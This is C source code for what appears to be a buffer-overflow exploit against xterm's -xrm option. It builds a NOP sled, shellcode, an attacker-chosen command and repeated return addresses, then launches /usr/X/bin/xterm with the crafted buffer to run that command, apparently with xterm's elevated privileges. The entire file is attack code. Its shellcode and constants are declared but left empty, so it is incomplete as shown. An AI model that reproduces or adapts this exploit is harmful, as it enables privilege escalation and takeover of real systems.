
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFFER_SIZE ;
 int LEN ;
 char NOP ;
 int RET_LENGTH ;
 long atol (char*) ;
 int execl (char*,char*,char*,char*,int *) ;
 int exit (int) ;
 int fprintf (int ,char*,char*) ;
 int printf (char*,...) ;
 char* shell ;
 int stderr ;
 int strlen (char*) ;

int
main(int argc, char *argv[])
{
   char start_addr[4];
   char buffer[BUFFER_SIZE+(RET_LENGTH*4)+1];
   char *command;
   long offset, ret, start_address;
   int len, x, y, shell_start;

   if(argc > 3 || argc < 2) {
      fprintf(stderr, "Usage: %s [command] [offset]\n", argv[0]);
      exit(1);
   }

   command = argv[1];
   if(argc == 3) offset = atol(argv[2]);
   else offset = 0;

   len = strlen(command);
   len++;
   len = -len;
   shell[LEN+0] = (len >> 0) & 0xff;
   shell[LEN+1] = (len >> 8) & 0xff;
   shell[LEN+2] = (len >> 16) & 0xff;
   shell[LEN+3] = (len >> 24) & 0xff;

   start_address = (long)&start_addr;


   ret = 0x8047910 - offset;

   for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP;

   x = BUFFER_SIZE - strlen(command) - strlen(shell);

   for(y=0; y<strlen(shell); y++)
      buffer[x++] = shell[y];

   for(y=0; y<strlen(command); y++)
      buffer[x++] = command[y];

   for(y=0; y<RET_LENGTH; y++, x += 4)
      *((int *)&buffer[x]) = ret;

   buffer[x] = 0x00;

   printf("start_address = 0x%x\n", start_address);
   printf("ret = 0x%x,\n", ret);
   printf("offset = %d\n", offset);
   printf("command = %s\n", command);
   printf("buffer size = %d\n", strlen(buffer));
   execl("/usr/X/bin/xterm", "xterm", "-xrm", buffer, ((void*)0));
   printf("exec failed\n");
}
